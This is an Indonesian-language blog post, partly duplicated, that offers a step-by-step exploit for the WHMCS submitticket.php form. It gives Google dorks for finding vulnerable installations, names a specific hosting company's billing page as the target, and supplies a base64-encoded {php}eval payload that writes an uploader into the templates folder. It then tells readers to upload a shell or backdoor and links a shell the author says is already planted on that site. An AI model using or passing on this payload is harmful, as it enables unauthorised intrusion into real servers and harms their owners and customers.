Sebelumnya saya ingin menjelaskan apa sih WHMCS itu?? WHMCS adalah sebuah cms yg memudahkan kita untuk membuat server hostingan itu menurut saya, kalo kurang jelas search di google.
Oke langsung aja ke POC nya ;)
Exploit with submit ticket php:
1. Carilah sebuah site yg Vuln dengan menggunakan dork / juga bisa menggunakan irc jika ada BOTnya. Nih saya Share Dorknya dikit aja ya, kalo banyak" nanti ga cukup docnya :v :
intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php" intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
2. Misalnya kita mendapatkan target, okelah saya contohkan site yang vuln :
https://billing.byehosting.com.au/byehosting/billing/submitticket.php?step=2&deptid=4
3. Isikan exploit berikut yang sudah saya encrypt kedalam base64 :
Name : exploitnya
Email : aku@gay.com
Subject : exploitnya
Kolom besar : exploitnya
Verification di isi jika ada
Exploit di atas berisi script php upload dan dir path dimana tempat upload itu muncul.
4. Kalo Sudah di isi, kemudian cek apakah muncul tempat upload atau tidak, dengan mengganti menjadi :
https://billing.byehosting.com.au/byehosting/billing/templates/syndrom.php
Kalo muncul , upload aja langsung shellnya / Backdoor. :D
Kalo tidak muncul istilah lain not found / forbidden, berarti tidak vuln.
Berikut Shell yang sudah saya upload :
https://billing.byehosting.com.au/byehosting/billing/templates/manipulasiberasaldarikatamenipulasi.php
Oke langsung aja ke POC nya ;)
Exploit with submit ticket php:
1. Carilah sebuah site yg Vuln dengan menggunakan dork / juga bisa menggunakan irc jika ada BOTnya. Nih saya Share Dorknya dikit aja ya, kalo banyak" nanti ga cukup docnya :v :
intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php" intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
2. Misalnya kita mendapatkan target, okelah saya contohkan site yang vuln :
https://billing.byehosting.com.au/byehosting/billing/submitticket.php?step=2&deptid=4
3. Isikan exploit berikut yang sudah saya encrypt kedalam base64 :
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWe UlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMm w2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZ YQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa 2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYn lBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGV tcGxhdGVzL3N5bmRyb20ucGhwIiwidyIpOw0KZndyaXRlKCRmbywkY29kZSk7')) ;{/php})
Name : exploitnya
Email : aku@gay.com
Subject : exploitnya
Kolom besar : exploitnya
Verification di isi jika ada
Exploit di atas berisi script php upload dan dir path dimana tempat upload itu muncul.
4. Kalo Sudah di isi, kemudian cek apakah muncul tempat upload atau tidak, dengan mengganti menjadi :
https://billing.byehosting.com.au/byehosting/billing/templates/syndrom.php
Kalo muncul , upload aja langsung shellnya / Backdoor. :D
Kalo tidak muncul istilah lain not found / forbidden, berarti tidak vuln.
Berikut Shell yang sudah saya upload :
https://billing.byehosting.com.au/byehosting/billing/templates/manipulasiberasaldarikatamenipulasi.php
0 comments